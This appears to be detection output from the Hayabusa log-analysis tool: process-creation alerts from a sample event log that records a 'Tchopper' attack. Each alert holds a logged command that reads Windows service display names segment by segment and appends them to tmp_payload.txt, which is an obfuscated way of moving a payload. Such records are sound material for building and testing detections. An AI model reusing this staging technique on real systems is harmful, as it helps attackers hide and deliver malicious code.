+2021-11-03 17:35:52.551 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:52.566 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:55.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:55.453 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:56.883 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:56.898 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:04.183 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:04.198 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:05.632 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:05.648 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x390 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:10.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:10.036 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:11.507 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:11.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:17.308 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:18.775 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:18.790 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:21.707 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:21.722 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
